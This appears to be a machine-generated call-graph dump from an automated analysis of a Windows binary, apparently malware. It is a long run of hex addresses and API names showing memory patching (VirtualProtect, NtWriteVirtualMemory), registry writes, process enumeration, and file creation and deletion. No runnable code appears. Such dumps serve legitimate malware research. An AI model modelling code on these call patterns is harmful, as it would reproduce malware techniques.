11 API calls 36095->36097 36104 29a5b9a 36096->36104 36105 29a6efc 36097->36105 36106 29a71d3 36098->36106 36101 2997e14 25 API calls 36099->36101 36103 2984798 11 API calls 36100->36103 36102 29a76b9 36101->36102 36107 298480c 11 API calls 36102->36107 36114 29a66e6 36103->36114 36108 2997e14 25 API calls 36104->36108 36110 2997e14 25 API calls 36105->36110 36111 2997e14 25 API calls 36106->36111 36117 29a76da 36107->36117 36109 29a5bbe 36108->36109 36538 29849a4 36109->36538 36112 29a6f20 36110->36112 36113 29a71f7 36111->36113 36115 298480c 11 API calls 36112->36115 36116 298480c 11 API calls 36113->36116 36118 2997e14 25 API calls 36114->36118 36125 29a6f41 36115->36125 36126 29a7218 36116->36126 36122 2984798 11 API calls 36117->36122 36120 29a670a 36118->36120 36123 298480c 11 API calls 36120->36123 36128 29a7711 36122->36128 36130 29a672b 36123->36130 36124 298480c 11 API calls 36131 29a5c02 36124->36131 36129 2984798 11 API calls 36125->36129 36127 2984798 11 API calls 36126->36127 36136 29a724f 36127->36136 36132 2997e14 25 API calls 36128->36132 36135 29a6f78 36129->36135 36133 2984798 11 API calls 36130->36133 36134 2984798 11 API calls 36131->36134 36139 29a7735 36132->36139 36143 29a6762 36133->36143 36140 29a5c39 36134->36140 36137 2997e14 25 API calls 36135->36137 36138 2997e14 25 API calls 36136->36138 36141 29a6f9c 36137->36141 36142 29a7273 36138->36142 36146 2997e14 25 API calls 36139->36146 36147 2997e14 25 API calls 36140->36147 36144 298480c 11 API calls 36141->36144 36145 298480c 11 API calls 36142->36145 36148 2997e14 25 API calls 36143->36148 36153 29a6fbd 36144->36153 36154 29a7294 36145->36154 36155 29a7768 36146->36155 36149 29a5c5d 36147->36149 36150 29a6786 36148->36150 36152 298480c 11 API calls 36149->36152 36151 298480c 11 API calls 36150->36151 36159 29a67a7 36151->36159 36160 29a5c7e 36152->36160 36156 2984798 11 API calls 36153->36156 36157 2984798 11 API calls 36154->36157 36158 2997e14 25 API calls 36155->36158 36163 29a6ff4 36156->36163 36164 29a72cb 36157->36164 36165 29a779b 36158->36165 36161 2984798 11 API calls 36159->36161 36162 2984798 11 API calls 36160->36162 36171 29a67de 36161->36171 36172 29a5cb5 36162->36172 36166 2997e14 25 API calls 36163->36166 36167 2997e14 25 API calls 36164->36167 36168 2997e14 25 API calls 36165->36168 36169 29a7018 36166->36169 36170 29a72ef 36167->36170 36180 29a77ce 36168->36180 36973 299cec8 36169->36973 36174 298480c 11 API calls 36170->36174 36177 2997e14 25 API calls 36171->36177 36175 2997e14 25 API calls 36172->36175 36186 29a7310 36174->36186 36178 29a5cd9 36175->36178 36181 29a6802 36177->36181 36182 298480c 11 API calls 36178->36182 36179 2984500 11 API calls 36183 29a703d 36179->36183 36187 2997e14 25 API calls 36180->36187 36184 29849a4 11 API calls 36181->36184 36190 29a5cfa 36182->36190 36185 298480c 11 API calls 36183->36185 36188 29a6826 36184->36188 36192 29a705e 36185->36192 36189 2984798 11 API calls 36186->36189 36193 29a7801 36187->36193 36191 298480c 11 API calls 36188->36191 36195 29a7347 36189->36195 36194 2984798 11 API calls 36190->36194 36201 29a6855 36191->36201 36197 2984798 11 API calls 36192->36197 36196 2997e14 25 API calls 36193->36196 36203 29a5d31 36194->36203 36199 2997e14 25 API calls 36195->36199 36198 29a7834 36196->36198 36204 29a7095 36197->36204 36200 298480c 11 API calls 36198->36200 36202 29a736b 36199->36202 36212 29a7855 36200->36212 36206 2984798 11 API calls 36201->36206 36205 29849a4 11 API calls 36202->36205 36208 2997e14 25 API calls 36203->36208 36210 2997e14 25 API calls 36204->36210 36207 29a7375 36205->36207 36217 29a688c 36206->36217 36993 29981b8 36207->36993 36209 29a5d55 36208->36209 36213 298480c 11 API calls 36209->36213 36214 29a70b9 36210->36214 36216 2984798 11 API calls 36212->36216 36220 29a5d76 36213->36220 36215 298480c 11 API calls 36214->36215 36222 29a70da 36215->36222 36223 29a788c 36216->36223 36218 2997e14 25 API calls 36217->36218 36219 29a68b0 36218->36219 36221 298480c 11 API calls 36219->36221 36224 2984798 11 API calls 36220->36224 36229 29a68d1 36221->36229 36225 2984798 11 API calls 36222->36225 36226 2997e14 25 API calls 36223->36226 36230 29a5dad 36224->36230 36231 29a7111 36225->36231 36227 29a78b0 36226->36227 36228 298480c 11 API calls 36227->36228 36235 29a78d1 36228->36235 36232 2984798 11 API calls 36229->36232 36233 2997e14 25 API calls 36230->36233 36234 2997e14 25 API calls 36231->36234 36239 29a6908 36232->36239 36236 29a5dd1 36233->36236 36245 29a7135 36234->36245 36238 2984798 11 API calls 36235->36238 36544 299a524 36236->36544 36244 29a7908 36238->36244 36240 2997e14 25 API calls 36239->36240 36242 29a692c 36240->36242 36243 298480c 11 API calls 36242->36243 36248 29a694d 36243->36248 36247 2997e14 25 API calls 36244->36247 36978 299c7b4 36245->36978 36249 29a792c 36247->36249 36250 2984798 11 API calls 36248->36250 36251 2997e14 25 API calls 36249->36251 36254 29a6984 36250->36254 36252 29a795f 36251->36252 36253 298480c 11 API calls 36252->36253 36257 29a7980 36253->36257 36255 2997e14 25 API calls 36254->36255 36256 29a69a8 EnumSystemLocalesA GetCurrentProcess 36255->36256 36956 2997cc8 LoadLibraryW 36256->36956 36261 2984798 11 API calls 36257->36261 36260 2997cc8 4 API calls 36262 29a69dd GetCurrentProcess 36260->36262 36266 29a79b7 36261->36266 36263 2997cc8 4 API calls 36262->36263 36264 29a69f1 GetCurrentProcess 36263->36264 36265 2997cc8 4 API calls 36264->36265 36267 29a6a05 GetCurrentProcess 36265->36267 36268 2997e14 25 API calls 36266->36268 36269 2997cc8 4 API calls 36267->36269 36270 29a79db 36268->36270 36271 29a6a19 GetCurrentProcess 36269->36271 36272 298480c 11 API calls 36270->36272 36273 2997cc8 4 API calls 36271->36273 36274 29a79fc 36272->36274 36273->35883 36275 2984798 11 API calls 36274->36275 36276 29a7a33 36275->36276 36277 2997e14 25 API calls 36276->36277 36278 29a7a57 36277->36278 36279 298480c 11 API calls 36278->36279 36280 29a7a78 36279->36280 36281 2984798 11 API calls 36280->36281 36282 29a7aaf 36281->36282 36283 2997e14 25 API calls 36282->36283 36284 29a7ad3 36283->36284 36285 2997e14 25 API calls 36284->36285 36286 29a7b06 36285->36286 36287 2997e14 25 API calls 36286->36287 36288 29a7b39 36287->36288 36289 2997e14 25 API calls 36288->36289 36290 29a7b6c 36289->36290 36291 2997e14 25 API calls 36290->36291 36292 29a7b9f 36291->36292 36293 298480c 11 API calls 36292->36293 36294 29a7bc0 36293->36294 36295 2984798 11 API calls 36294->36295 36296 29a7bf7 36295->36296 36297 2997e14 25 API calls 36296->36297 36298 29a7c1b 36297->36298 36299 298480c 11 API calls 36298->36299 36300 29a7c3c 36299->36300 36301 2984798 11 API calls 36300->36301 36302 29a7c73 36301->36302 36303 2997e14 25 API calls 36302->36303 36304 29a7c97 36303->36304 36305 2997e14 25 API calls 36304->36305 36306 29a7cca 36305->36306 36307 2997e14 25 API calls 36306->36307 36308 29a7cfd 36307->36308 36309 2997e14 25 API calls 36308->36309 36310 29a7d30 36309->36310 36311 2997e14 25 API calls 36310->36311 36312 29a7d63 36311->36312 36313 2997e14 25 API calls 36312->36313 36314 29a7d96 36313->36314 36315 298480c 11 API calls 36314->36315 36316 29a7db7 36315->36316 36317 2984798 11 API calls 36316->36317 36318 29a7dee 36317->36318 36319 2997e14 25 API calls 36318->36319 36320 29a7e12 36319->36320 36321 298480c 11 API calls 36320->36321 36322 29a7e33 36321->36322 36323 2984798 11 API calls 36322->36323 36324 29a7e6a 36323->36324 36325 2997e14 25 API calls 36324->36325 36326 29a7e8e 36325->36326 36327 298480c 11 API calls 36326->36327 36328 29a7eaf 36327->36328 36329 2984798 11 API calls 36328->36329 36330 29a7ee6 36329->36330 36331 2997e14 25 API calls 36330->36331 36470 298479c 36469->36470 36471 29847fd 36469->36471 36472 2984500 36470->36472 36473 29847a4 36470->36473 36478 2984570 11 API calls 36472->36478 36479 2984514 36472->36479 36473->36471 36475 29847b3 36473->36475 36477 2984500 11 API calls 36473->36477 36474 2984542 36474->35745 36476 2984570 11 API calls 36475->36476 36481 29847cd 36476->36481 36477->36475 36478->36479 36479->36474 36480 2982c2c 11 API calls 36479->36480 36480->36474 36482 2984500 11 API calls 36481->36482 36483 29847f9 36482->36483 36483->35745 36485 2997e28 36484->36485 36486 2997e4b LoadLibraryExA 36485->36486 37374 298494c 36486->37374 36489 298494c 36490 2997e6c GetProcAddress 36489->36490 37376 2997d4c 36490->37376 36492 2997e94 37385 2997b5c 36492->37385 36497 2997b5c 14 API calls 36498 2997ee1 NtFlushInstructionCache FreeLibrary 36497->36498 36499 2997eff 36498->36499 37403 29844d0 36499->37403 36509 299cc3c 36502->36509 36503 299ccbf 36504 29844ac 11 API calls 36503->36504 36505 299ccc7 36504->36505 36507 2984500 11 API calls 36505->36507 36506 29849a4 11 API calls 36506->36509 36508 299ccd2 36507->36508 36510 29844d0 11 API calls 36508->36510 36509->36503 36509->36506 36511 299ccec 36510->36511 36511->35775 36513 299d407 36512->36513 36514 299d432 RegOpenKeyA 36513->36514 36515 299d440 36514->36515 36516 29849a4 11 API calls 36515->36516 36517 299d458 36516->36517 36518 299d465 RegSetValueExA RegCloseKey 36517->36518 36519 299d489 36518->36519 36520 29844d0 11 API calls 36519->36520 36521 299d496 36520->36521 36522 29844ac 11 API calls 36521->36522 36523 299d49e 36522->36523 36523->35778 37411 299a174 36524->37411 36526 299a211 37416 299a194 36526->37416 36528 29844d0 11 API calls 36529 299a2ec 36528->36529 36529->35930 36530 299a28f CompareStringA 36531 299a2a8 36530->36531 36533 299a22c 36530->36533 36531->36528 36533->36530 36533->36531 37421 299a1b4 36533->37421 36535 2995a89 36534->36535 36537 2995aaa 36534->36537 36535->36537 37430 298afd8 42 API calls 36535->37430 36537->36071 36539 2984958 36538->36539 36540 2984570 11 API calls 36539->36540 36541 2984993 RtlMoveMemory 36539->36541 36542 298496f 36540->36542 36541->36124 36542->36541 36543 2982c2c 11 API calls 36542->36543 36543->36541 36545 299a52c 36544->36545 36545->36545 36546 298480c 11 API calls 36545->36546 36547 299a56c 36546->36547 36548 2984798 11 API calls 36547->36548 36549 299a591 36548->36549 36550 2997e14 25 API calls 36549->36550 36551 299a5ac 36550->36551 36552 298480c 11 API calls 36551->36552 36553 299a5c5 36552->36553 36554 2984798 11 API calls 36553->36554 36555 299a5ea 36554->36555 36556 2997e14 25 API calls 36555->36556 36557 299a605 36556->36557 36558 298480c 11 API calls 36557->36558 36559 299a61e 36558->36559 36560 2984798 11 API calls 36559->36560 36561 299a643 36560->36561 36562 2997e14 25 API calls 36561->36562 36563 299a65e 36562->36563 36564 298480c 11 API calls 36563->36564 36565 299a677 36564->36565 36566 2984798 11 API calls 36565->36566 36567 299a69c 36566->36567 36568 2997e14 25 API calls 36567->36568 36569 299a6b7 36568->36569 36570 298480c 11 API calls 36569->36570 36571 299a6d4 36570->36571 36572 2984798 11 API calls 36571->36572 36573 299a6f9 36572->36573 36574 2997e14 25 API calls 36573->36574 36575 299a714 36574->36575 36576 298480c 11 API calls 36575->36576 36577 299a753 36576->36577 36578 2984798 11 API calls 36577->36578 36579 299a778 36578->36579 36580 2997e14 25 API calls 36579->36580 36581 299a793 36580->36581 36582 298480c 11 API calls 36581->36582 36583 299a7ac 36582->36583 36584 2984798 11 API calls 36583->36584 36585 299a7d1 36584->36585 36586 2997e14 25 API calls 36585->36586 36587 299a7ec GetModuleHandleW GetProcAddress 36586->36587 36588 298480c 11 API calls 36587->36588 36589 299a822 36588->36589 36590 2984798 11 API calls 36589->36590 36591 299a84d 36590->36591 36592 2997e14 25 API calls 36591->36592 36593 299a871 36592->36593 36955->36090 36957 2997cef GetProcAddress 36956->36957 36958 2997d37 GetCurrentProcess 36956->36958 36959 2997d09 NtWriteVirtualMemory 36957->36959 36960 2997d2c FreeLibrary 36957->36960 36958->36260 36959->36960 36961 2997d2a 36959->36961 36960->36958 36961->36960 36963 299d295 36962->36963 36964 299d2c1 36963->36964 37447 2984694 11 API calls 36963->37447 37448 2984500 11 API calls 36963->37448 36966 29844ac 11 API calls 36964->36966 36967 299d2d6 36966->36967 36967->36021 36970 298494c 36969->36970 36971 2987e2a GetFileAttributesA 36970->36971 36972 2987e35 36971->36972 36972->36084 36972->36086 36974 2984b78 11 API calls 36973->36974 36975 299cee0 36974->36975 36976 299cf01 36975->36976 36977 29849a4 11 API calls 36975->36977 36976->36179 36977->36975 36979 299c7ca 36978->36979 37449 2984ecc 36979->37449 36981 299c7d2 36982 299c7f2 RtlDosPathNameToNtPathName_U 36981->36982 37455 299c6fc 36982->37455 36985 299c839 36986 29849a4 11 API calls 36985->36986 36987 299c84b NtWriteFile NtClose 36986->36987 36988 299c875 36987->36988 37457 2984c0c 36988->37457 36991 29844ac 11 API calls 36992 299c885 36991->36992 36992->36084 36994 29981c0 36993->36994 36995 298480c 11 API calls 36994->36995 36996 2998203 36995->36996 36997 2984798 11 API calls 36996->36997 36998 2998228 36997->36998 36999 2997e14 25 API calls 36998->36999 37000 2998243 36999->37000 37001 298480c 11 API calls 37000->37001 37002 299825c 37001->37002 37003 2984798 11 API calls 37002->37003 37004 2998281 37003->37004 37005 2997e14 25 API calls 37004->37005 37006 299829c 37005->37006 37007 2999c93 37006->37007 37008 298480c 11 API calls 37006->37008 37009 29844d0 11 API calls 37007->37009 37013 29982cd 37008->37013 37010 2999cb0 37009->37010 37011 29844d0 11 API calls 37010->37011 37012 2999cc0 37011->37012 37014 2984c0c SysFreeString 37012->37014 37016 2984798 11 API calls 37013->37016 37015 2999ccb 37014->37015 37017 29844d0 11 API calls 37015->37017 37021 29982f2 37016->37021 37018 2999cdb 37017->37018 37019 29844ac 11 API calls 37018->37019 37020 2999ce3 37019->37020 37022 29844d0 11 API calls 37020->37022 37024 2997e14 25 API calls 37021->37024 37023 2999cf0 37022->37023 37025 29844d0 11 API calls 37023->37025 37026 299830d 37024->37026 37027 2999cfd 37025->37027 37028 298480c 11 API calls 37026->37028 37027->35939 37029 2998326 37028->37029 37030 2984798 11 API calls 37029->37030 37031 299834b 37030->37031 37032 2997e14 25 API calls 37031->37032 37033 2998366 37032->37033 37033->37007 37034 298480c 11 API calls 37033->37034 37035 29983ae 37034->37035 37036 2984798 11 API calls 37035->37036 37037 29983d3 37036->37037 37038 2997e14 25 API calls 37037->37038 37039 29983ee 37038->37039 37040 298480c 11 API calls 37039->37040 37041 2998407 37040->37041 37042 2984798 11 API calls 37041->37042 37043 299842c 37042->37043 37044 2997e14 25 API calls 37043->37044 37045 2998447 37044->37045 37046 298480c 11 API calls 37045->37046 37047 299848c 37046->37047 37048 2984798 11 API calls 37047->37048 37049 29984b1 37048->37049 37050 2997e14 25 API calls 37049->37050 37051 29984cc 37050->37051 37052 298480c 11 API calls 37051->37052 37053 29984e5 37052->37053 37054 2984798 11 API calls 37053->37054 37055 299850d 37054->37055 37056 2997e14 25 API calls 37055->37056 37057 299852b 37056->37057 37058 298480c 11 API calls 37057->37058 37059 2998547 37058->37059 37060 2984798 11 API calls 37059->37060 37061 2998578 37060->37061 37062 2997e14 25 API calls 37061->37062 37063 299859c 37062->37063 37064 298480c 11 API calls 37063->37064 37065 29985b8 37064->37065 37066 2984798 11 API calls 37065->37066 37067 29985e9 37066->37067 37068 2997e14 25 API calls 37067->37068 37069 299860d 37068->37069 37070 298480c 11 API calls 37069->37070 37071 2998629 37070->37071 37072 2984798 11 API calls 37071->37072 37073 299865a 37072->37073 37074 2997e14 25 API calls 37073->37074 37375 2984950 GetModuleHandleA 37374->37375 37375->36489 37407 2984544 37376->37407 37379 2984798 11 API calls 37380 2997d7f 37379->37380 37381 2997d87 GetModuleHandleA GetProcAddress VirtualProtect 37380->37381 37382 2997dc3 37381->37382 37383 29844d0 11 API calls 37382->37383 37384 2997dd0 37383->37384 37384->36492 37386 2984500 11 API calls 37385->37386 37387 2997b7f 37386->37387 37388 298480c 11 API calls 37387->37388 37389 2997bd0 37388->37389 37390 2997bd8 GetModuleHandleW GetProcAddress GetCurrentProcess 37389->37390 37391 2997c03 37390->37391 37392 29844ac 11 API calls 37391->37392 37393 2997c0b 37392->37393 37394 2997a94 37393->37394 37395 2984500 11 API calls 37394->37395 37396 2997ab7 37395->37396 37397 2984798 11 API calls 37396->37397 37398 2997aca 37397->37398 37399 2997ad2 GetModuleHandleA GetProcAddress NtWriteVirtualMemory 37398->37399 37400 2997b0f 37399->37400 37401 29844ac 11 API calls 37400->37401 37402 2997b17 37401->37402 37402->36497 37404 29844d6 37403->37404 37405 29844fc 37404->37405 37406 2982c2c 11 API calls 37404->37406 37405->35748 37406->37404 37409 2984548 37407->37409 37408 298456c 37408->37379 37409->37408 37410 2982c2c 11 API calls 37409->37410 37410->37408 37426 2999ef8 37411->37426 37414 299a18e 37414->36526 37415 299a183 CreateToolhelp32Snapshot 37415->36526 37417 2999ef8 17 API calls 37416->37417 37418 299a19f 37417->37418 37419 299a1ae 37418->37419 37420 299a1a3 Process32First 37418->37420 37419->36533 37420->36533 37422 2999ef8 17 API calls 37421->37422 37423 299a1bf 37422->37423 37424 299a1ce 37423->37424 37425 299a1c3 Process32Next 37423->37425 37424->36533 37425->36533 37427 299a03c 37426->37427 37428 2999f07 GetModuleHandleA 37426->37428 37427->37414 37427->37415 37428->37427 37429 2999f1c 16 API calls 37428->37429 37429->37427 37430->36537 37447->36963 37448->36963 37450 2984ee8 37449->37450 37451 2984ed2 SysAllocStringLen 37449->37451 37450->36981 37451->37450 37452 2984bdc 37451->37452 37453 2984bf8 37452->37453 37454 2984be8 SysAllocStringLen 37452->37454 37453->36981 37454->37452 37454->37453 37456 299c720 NtCreateFile 37455->37456 37456->36985 37458 2984c20 37457->37458 37459 2984c12 SysFreeString 37457->37459 37458->36991 37459->37458 37466 29a23b3 37467 298480c 11 API calls 37466->37467 37468 29a23d4 37467->37468 37469 298494c 37468->37469 37470 29a23df 37469->37470 37471 29a23ec 37470->37471 37472 2984798 11 API calls 37471->37472 37473 29a240b 37472->37473 37474 29a2416 37473->37474 37475 29a2423 37474->37475 37476 2997e14 25 API calls 37475->37476 37477 29a242f 37476->37477 37478 298480c 11 API calls 37477->37478 37479 29a2450 37478->37479 37480 298494c 37479->37480 37481 29a245b 37480->37481 37482 2984798 11 API calls 37481->37482 37483 29a2487 37482->37483 37484 298494c 37483->37484 37485 29a2492 37484->37485 37486 2997e14 25 API calls 37485->37486 37487 29a24ab 37486->37487 37488 298480c 11 API calls 37487->37488 37489 29a24cc 37488->37489 37490 29a24d7 37489->37490 37491 2984798 11 API calls 37490->37491 37492 29a2503 37491->37492 37493 29a250e 37492->37493 37494 2997e14 25 API calls 37493->37494 37495 29a2527 37494->37495 37496 298480c 11 API calls 37495->37496 37497 29a2548 37496->37497 37498 29a2560 37497->37498 37499 2984798 11 API calls 37498->37499 37500 29a257f 37499->37500 37501 2997e14 25 API calls 37500->37501 37502 29a25a3 37501->37502 37503 298480c 11 API calls 37502->37503 37504 29a25c4 37503->37504 37505 29a25dc 37504->37505 37506 2984798 11 API calls 37505->37506 37507 29a25fb 37506->37507 37508 2997e14 25 API calls 37507->37508 37509 29a261f 37508->37509 37510 298480c 11 API calls 37509->37510 37511 29a2640 37510->37511 37512 29a2658 37511->37512 37513 2984798 11 API calls 37512->37513 37514 29a2677 37513->37514 37515 2997e14 25 API calls 37514->37515 37516 29a269b 37515->37516 37517 298480c 11 API calls 37516->37517 37518 29a26bc 37517->37518 37519 29a26d4 37518->37519 37520 2984798 11 API calls 37519->37520 37521 29a26f3 37520->37521 37522 2997e14 25 API calls 37521->37522 37523 29a2717 37522->37523 37524 298480c 11 API calls 37523->37524 37525 29a2738 37524->37525 37526 29a2750 37525->37526 37527 2984798 11 API calls 37526->37527 37528 29a276f 37527->37528 37529 2997e14 25 API calls 37528->37529 37530 29a2793 37529->37530 37531 298480c 11 API calls 37530->37531 37532 29a27b4 37531->37532 37533 29a27cc 37532->37533 37534 2984798 11 API calls 37533->37534 37535 29a27eb 37534->37535 37536 29a27f6 37535->37536 37537 29a2803 37536->37537 37538 2997e14 25 API calls 37537->37538 37539 29a280f 37538->37539 37540 299d270 11 API calls 37539->37540 37541 29a282a 37540->37541 37542 298480c 11 API calls 37541->37542 37543 29a2853 37542->37543 37544 29a285e 37543->37544 37545 29a286a 37544->37545 37546 298480c 11 API calls 37545->37546 37547 29a288b 37546->37547 37548 29a2896 37547->37548 37549 29a28a3 37548->37549 37550 2984798 11 API calls 37549->37550 37551 29a28c2 37550->37551 37552 29a28cd 37551->37552 37553 29a28da 37552->37553 37554 2997e14 25 API calls 37553->37554 37555 29a28e6 37554->37555 37556 298480c 11 API calls 37555->37556 37557 29a2907 37556->37557 37558 2984798 11 API calls 37557->37558 37559 29a293e 37558->37559 37560 2997e14 25 API calls 37559->37560 37561 29a2962 37560->37561 37562 299cec8 11 API calls 37561->37562 37563 29a2977 37562->37563 37564 29a2998 37563->37564 37565 298480c 11 API calls 37564->37565 37566 29a29b9 37565->37566 37567 29a29d1 37566->37567 37568 2984798 11 API calls 37567->37568 37569 29a29f0 37568->37569 37570 29a2a08 37569->37570 37571 2997e14 25 API calls 37570->37571 37572 29a2a14 37571->37572 37573 298480c 11 API calls 37572->37573 37574 29a2a35 37573->37574 37575 29a2a40 37574->37575 37576 2984798 11 API calls 37575->37576 37577 29a2a6c 37576->37577 37578 29a2a77 37577->37578 37579 2997e14 25 API calls 37578->37579 37580 29a2a90 37579->37580 37581 298480c 11 API calls 37580->37581 37582 29a2ab1 37581->37582 37583 2984798 11 API calls 37582->37583 37584 29a2ae8 37583->37584 37585 29a2af3 37584->37585 37586 2997e14 25 API calls 37585->37586 37587 29a2b0c 37586->37587 37588 2987e20 GetFileAttributesA 37587->37588 37589 29a2b16 37588->37589 37590 29a2b1e 37589->37590 37591 29a2df5 37589->37591 37592 298480c 11 API calls 37590->37592 37593 298480c 11 API calls 37591->37593 37594 29a2b3f 37592->37594 37595 29a2e16 37593->37595 37596 29a2b4a 37594->37596 37598 29a2e2e 37595->37598 37597 29a2b57 37596->37597 37599 2984798 11 API calls 37597->37599 37600 2984798 11 API calls 37598->37600 37601 29a2b76 37599->37601 37604 29a2e4d 37600->37604 37602 29a2b81 37601->37602 37603 29a2b8e 37602->37603 37605 2997e14 25 API calls 37603->37605 37606 2997e14 25 API calls 37604->37606 37607 29a2b9a 37605->37607 37608 29a2e71 37606->37608 37609 298480c 11 API calls 37607->37609 37610 298480c 11 API calls 37608->37610 37611 29a2bbb 37609->37611 37612 29a2e92 37610->37612 37613 29a2bc6 37611->37613 37614 29a2eaa 37612->37614 37615 29a2bd3 37613->37615 37617 2984798 11 API calls 37614->37617 37616 2984798 11 API calls 37615->37616 37618 29a2bf2 37616->37618 37620 29a2ec9 37617->37620 37619 29a2c0a 37618->37619 37621 2997e14 25 API calls 37619->37621 37622 2997e14 25 API calls 37620->37622 37623 29a2c16 37621->37623 37624 29a2eed 37622->37624 37625 298480c 11 API calls 37623->37625 37626 298480c 11 API calls 37624->37626 37627 29a2c37 37625->37627 37628 29a2f0e 37626->37628 37630 29a2c42 37627->37630 37629 29a2f26 37628->37629 37631 2984798 11 API calls 37629->37631 37632 2984798 11 API calls 37630->37632 37633 29a2f45 37631->37633 37634 29a2c6e 37632->37634 37635 29a2f5d 37633->37635 37636 29a2c79 37634->37636 37638 2997e14 25 API calls 37635->37638 37637 2997e14 25 API calls 37636->37637 37639 29a2c92 37637->37639 37640 29a2f69 37638->37640 37641 299cec8 11 API calls 37639->37641 37642 298480c 11 API calls 37640->37642 37643 29a2ca7 37641->37643 37644 29a2f8a 37642->37644 37645 2984500 11 API calls 37643->37645 37649 29a2f95 37644->37649 37646 29a2cb7 37645->37646 37647 298480c 11 API calls 37646->37647 37648 29a2cd8 37647->37648 37652 29a2ce3 37648->37652 37650 2984798 11 API calls 37649->37650 37651 29a2fc1 37650->37651 37655 29a2fcc 37651->37655 37653 2984798 11 API calls 37652->37653 37654 29a2d0f 37653->37654 37659 29a2d1a 37654->37659 37656 2997e14 25 API calls 37655->37656 37657 29a2fe5 37656->37657 37658 29849a4 11 API calls 37657->37658 37660 29a2fef 37658->37660 37661 2997e14 25 API calls 37659->37661 37662 29981b8 43 API calls 37660->37662 37663 29a2d33 37661->37663 37664 29a2ffb 37662->37664 37665 298480c 11 API calls 37663->37665 37666 298480c 11 API calls 37664->37666 37668 29a2d54 37665->37668 37667 29a301c 37666->37667 37669 29a3027 37667->37669 37671 2984798 11 API calls 37668->37671 37670 2984798 11 API calls 37669->37670 37672 29a3053 37670->37672 37673 29a2d8b 37671->37673 37674 29a305e 37672->37674 37675 2997e14 25 API calls 37673->37675 37676 2997e14 25 API calls 37674->37676 37677 29a2daf 37675->37677 37678 29a3077 37676->37678 37680 29a2dc0 37677->37680 37679 298480c 11 API calls 37678->37679 37681 29a3098 37679->37681 37682 299c7b4 18 API calls 37680->37682 37683 2984798 11 API calls 37681->37683 37682->37591 37684 29a30cf 37683->37684 37685 2997e14 25 API calls 37684->37685 37686 29a30f3 Sleep 37685->37686 37687 298480c 11 API calls 37686->37687 37688 29a311e 37687->37688 37689 29a3136 37688->37689 37690 2984798 11 API calls 37689->37690 37691 29a3155 37690->37691 37692 29a316d 37691->37692 37693 2997e14 25 API calls 37692->37693 37694 29a3179 37693->37694 37695 298480c 11 API calls 37694->37695 37696 29a319a 37695->37696 37697 29a31a5 37696->37697 37698 2984798 11 API calls 37697->37698 37699 29a31d1 37698->37699 37700 29a31dc 37699->37700 37701 2997e14 25 API calls 37700->37701 37702 29a31f5 37701->37702 37703 29a3205 37702->37703 38718 299c724 37703->38718 37706 298480c 11 API calls 37707 29a3231 37706->37707 37708 29a323c 37707->37708 37709 2984798 11 API calls 37708->37709 37710 29a3268 37709->37710 37711 29a3273 37710->37711 37712 2997e14 25 API calls 37711->37712 37713 29a328c 37712->37713 37714 298480c 11 API calls 37713->37714 37715 29a32ad 37714->37715 37716 2984798 11 API calls 37715->37716 37717 29a32e4 37716->37717 37718 2997e14 25 API calls 37717->37718 37719 29a3308 37718->37719 37720 298480c 11 API calls 37719->37720 37721 29a3329 37720->37721 37722 2984798 11 API calls 37721->37722 37723 29a3360 37722->37723 37724 2997e14 25 API calls 37723->37724 37725 29a3384 37724->37725 37726 298480c 11 API calls 37725->37726 37727 29a33a5 37726->37727 37728 2984798 11 API calls 37727->37728 37729 29a33dc 37728->37729 37730 2997e14 25 API calls 37729->37730 37731 29a3400 37730->37731 38729 299cf08 37731->38729 37734 2984500 11 API calls 37735 29a3426 37734->37735 37736 298480c 11 API calls 37735->37736 37737 29a3447 37736->37737 37738 29a3452 37737->37738 37739 2984798 11 API calls 37738->37739 37740 29a347e 37739->37740 37741 29a3489 37740->37741 37742 2997e14 25 API calls 37741->37742 37743 29a34a2 37742->37743 37744 298480c 11 API calls 37743->37744 37745 29a34c3 37744->37745 37746 2984798 11 API calls 37745->37746 37747 29a34fa 37746->37747 37748 2997e14 25 API calls 37747->37748 37749 29a351e 37748->37749 38742 2987a90 37749->38742 37754 2984500 11 API calls 37755 29a354a 37754->37755 37756 298480c 11 API calls 37755->37756 37757 29a356b 37756->37757 37758 2984798 11 API calls 37757->37758 37759 29a35a2 37758->37759 37760 2997e14 25 API calls 37759->37760 37761 29a35c6 37760->37761 37762 298480c 11 API calls 37761->37762 37763 29a35e7 37762->37763 37764 2984798 11 API calls 37763->37764 37765 29a361e 37764->37765 37766 2997e14 25 API calls 37765->37766 37767 29a3642 37766->37767 37768 298480c 11 API calls 37767->37768 37769 29a3663 37768->37769 37770 2984798 11 API calls 37769->37770 37771 29a369a 37770->37771 37772 2997e14 25 API calls 37771->37772 37773 29a36be 37772->37773 37774 298480c 11 API calls 37773->37774 37775 29a36df 37774->37775 37776 2984798 11 API calls 37775->37776 37777 29a3716 37776->37777 37778 2997e14 25 API calls 37777->37778 37779 29a373a 37778->37779 37780 299d270 11 API calls 37779->37780 37781 29a374a 37780->37781 38755 299d2e4 37781->38755 37784 2984500 11 API calls 37785 29a376b 37784->37785 37786 298480c 11 API calls 37785->37786 37787 29a378c 37786->37787 37788 2984798 11 API calls 37787->37788 37789 29a37c3 37788->37789 37790 2997e14 25 API calls 37789->37790 37791 29a37e7 37790->37791 37792 298480c 11 API calls 37791->37792 37793 29a3808 37792->37793 37794 2984798 11 API calls 37793->37794 37795 29a383f 37794->37795 37796 2997e14 25 API calls 37795->37796 37797 29a3863 37796->37797 37798 298480c 11 API calls 37797->37798 37799 29a3884 37798->37799 37800 2984798 11 API calls 37799->37800 37801 29a38bb 37800->37801 37802 2997e14 25 API calls 37801->37802 37803 29a38df 37802->37803 37804 298480c 11 API calls 37803->37804 37805 29a3900 37804->37805 37806 2984798 11 API calls 37805->37806 37807 29a3937 37806->37807 37808 2997e14 25 API calls 37807->37808 37809 29a395b 37808->37809 37810 298480c 11 API calls 37809->37810 37811 29a397c 37810->37811 37812 2984798 11 API calls 37811->37812 37813 29a39b3 37812->37813 37814 2997e14 25 API calls 37813->37814 37815 29a39d7 37814->37815 37816 298480c 11 API calls 37815->37816 37817 29a39f8 37816->37817 38719 299c725 38718->38719 38720 2984ecc 2 API calls 38719->38720 38721 299c736 RtlInitUnicodeString 38720->38721 38770 2984d9c 38721->38770 38724 299c6fc 38725 299c77d NtDeleteFile 38724->38725 38726 299c795 38725->38726 38727 2984c0c SysFreeString 38726->38727 38728 299c79d 38727->38728 38728->37706 38738 299cf2a 38729->38738 38730 299cfcc 38731 2984b78 11 API calls 38730->38731 38732 299cfe1 38731->38732 38733 2984500 11 API calls 38732->38733 38735 299cfec 38733->38735 38737 29844ac 11 API calls 38735->38737 38739 299d001 38737->38739 38738->38730 